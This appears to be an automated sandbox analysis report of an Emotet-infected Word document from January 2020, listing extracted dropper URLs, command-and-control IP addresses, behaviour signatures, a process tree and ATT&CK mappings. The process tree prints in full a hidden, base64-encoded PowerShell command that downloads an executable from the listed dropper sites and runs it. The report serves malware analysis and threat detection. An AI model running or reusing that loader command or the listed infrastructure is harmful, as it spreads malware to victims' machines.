Analysis

  • max time kernel
    27s
  • resource
    win10v191014
  • submitted
    14-01-2020 23:30

General

  • Target

    5e15f1ee102118fbeaad354f33c3d2c16d4da683bf74bfaf23b368d2e84a7f2e

  • Sample

    200114-h9dmma76js

  • SHA256

    5e15f1ee102118fbeaad354f33c3d2c16d4da683bf74bfaf23b368d2e84a7f2e

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://xmdivas.com/a9981b580e0fef550bcb0fd8fadcc02b/eiqgv/

exe.dropper

http://digitaltimbangan.com/cgi-bin/cj8/

exe.dropper

https://sports.tj/wp-includes/p5n5i1d/

exe.dropper

https://work4sales.com/wp-content/rw5N8k08Ed/

exe.dropper

https://rmntnk.ru/omlakdj17fkcjfsd/rxm1/

Extracted

Family

emotet

C2

66.7.242.50:8080

72.186.137.156:80

197.89.27.26:8080

91.250.96.22:8080

37.187.72.193:8080

104.131.44.150:8080

167.71.10.37:8080

78.24.219.147:8080

159.65.25.128:8080

95.128.43.213:8080

179.13.185.19:80

186.86.247.171:443

110.142.38.16:80

201.173.217.124:443

169.239.182.217:8080

211.63.71.72:8080

104.131.11.150:8080

190.55.181.54:443

209.146.22.34:443

64.53.242.181:8080

rsa_pubkey.plain

Signatures

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\5e15f1ee102118fbeaad354f33c3d2c16d4da683bf74bfaf23b368d2e84a7f2e.doc" /o ""
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:4940
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w hidden -en JABOAHoAeQBsAHIAdwBiAG0AawB0AD0AJwBBAHAAbgBtAGQAdgB6AHQAJwA7ACQAWgBxAHAAdgB4AHgAaABvAGsAcgAgAD0AIAAnADMAOAAwACcAOwAkAFgAcgBzAHYAcgBuAGUAYwBoAGsAPQAnAEgAZwBkAHMAcgB6AG4AegBnAGwAJwA7ACQAVABuAHoAdgBiAHgAaABlAG8AawBuAGEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAcQBwAHYAeAB4AGgAbwBrAHIAKwAnAC4AZQB4AGUAJwA7ACQASQBqAHYAawBvAHMAcgB6AG8AcABhAHUAegA9ACcAWQBmAHEAeABxAGkAZgBmAGYAYQAnADsAJABHAHUAbAB4AGsAcgB5AGgAcQBmAGcAPQAuACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAE4ARQBUAC4AVwBlAEIAQwBMAGkARQBOAHQAOwAkAEkAbQBzAGYAcQBxAGgAZABnAGUAdgBiAG0APQAnAGgAdAB0AHAAOgAvAC8AeABtAGQAaQB2AGEAcwAuAGMAbwBtAC8AYQA5ADkAOAAxAGIANQA4ADAAZQAwAGYAZQBmADUANQAwAGIAYwBiADAAZgBkADgAZgBhAGQAYwBjADAAMgBiAC8AZQBpAHEAZwB2AC8AKgBoAHQAdABwADoALwAvAGQAaQBnAGkAdABhAGwAdABpAG0AYgBhAG4AZwBhAG4ALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBjAGoAOAAvACoAaAB0AHQAcABzADoALwAvAHMAcABvAHIAdABzAC4AdABqAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AcAA1AG4ANQBpADEAZAAvACoAaAB0AHQAcABzADoALwAvAHcAbwByAGsANABzAGEAbABlAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwByAHcANQBOADgAawAwADgARQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AcgBtAG4AdABuAGsALgByAHUALwBvAG0AbABhAGsAZABqADEANwBmAGsAYwBqAGYAcwBkAC8AcgB4AG0AMQAvACcALgAiAFMAUABMAGAAaQB0ACIAKAAnACoAJwApADsAJABVAHcAegBkAG0AYgB3AG4AaAA9ACcATwBvAHMAcwB2AHMAZgBpAHQAcABwAG8AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAgAGkAbgAgACQASQBtAHMAZgBxAHEAaABkAGcAZQB2AGIAbQApAHsAdAByAHkAewAkAEcAdQBsAHgAawByAHkAaABxAGYAZwAuACIAZABvAHcATgBgAGwAbwBhAEQAYABGAGkATABFACIAKAAkAFMAZwBuAHUAagBqAGoAbgBnAG8AdAAsACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABOAHoAbgBjAGUAcABqAGwAawB4AGMAPQAnAE4AcwBkAG4AYwBnAGwAYwBpAHgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApAC4AIgBsAGUAbgBgAEcAVABIACIAIAAtAGcAZQAgADMAMgA0ADUAMgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAFQAYABBAFIAVAAiACgAJABUAG4AegB2AGIAeABoAGUAbwBrAG4AYQApADsAJABBAHMAagBzAGYAaQBnAG8AegBjAGkAPQAnAEMAagBjAGUAdgBwAGcAZwAnADsAYgByAGUAYQBrADsAJABRAGIAbgBpAGgAbgBlAGIAeAByAHEAPQAnAEIAcgByAHUAaQB5AG8AcQB1AGMAeQBkACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAYwBhAGQAaABpAGMAdABxAHMAegB5AGEAPQAnAEwAdABtAG4AcwBhAG0AZAAnAA==
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3748
    • C:\Users\Admin\380.exe
      "C:\Users\Admin\380.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      PID:4716
      • C:\Users\Admin\380.exe
        --4c4a2509
        3⤵
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        PID:4388
  • C:\Windows\SysWOW64\printmemo.exe
    "C:\Windows\SysWOW64\printmemo.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    PID:3868
    • C:\Windows\SysWOW64\printmemo.exe
      --bf68e91d
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      PID:4336

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Microsoft\Crypto\RSA\S-1-5-18\403f0cc78adafaecdb503a6c6424923d_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • C:\Users\Admin\380.exe
  • C:\Users\Admin\380.exe
  • C:\Users\Admin\380.exe
  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
  • C:\Windows\SysWOW64\printmemo.exe
  • C:\Windows\SysWOW64\printmemo.exe
  • memory/3868-13-0x0000000000610000-0x0000000000627000-memory.dmp
    Filesize

    92KB

  • memory/4336-16-0x0000000000CA0000-0x0000000000CB7000-memory.dmp
    Filesize

    92KB

  • memory/4336-17-0x0000000000400000-0x000000000046E000-memory.dmp
    Filesize

    440KB

  • memory/4388-11-0x0000000000400000-0x000000000046E000-memory.dmp
    Filesize

    440KB

  • memory/4388-10-0x0000000000600000-0x0000000000617000-memory.dmp
    Filesize

    92KB

  • memory/4716-7-0x00000000021E0000-0x00000000021F7000-memory.dmp
    Filesize

    92KB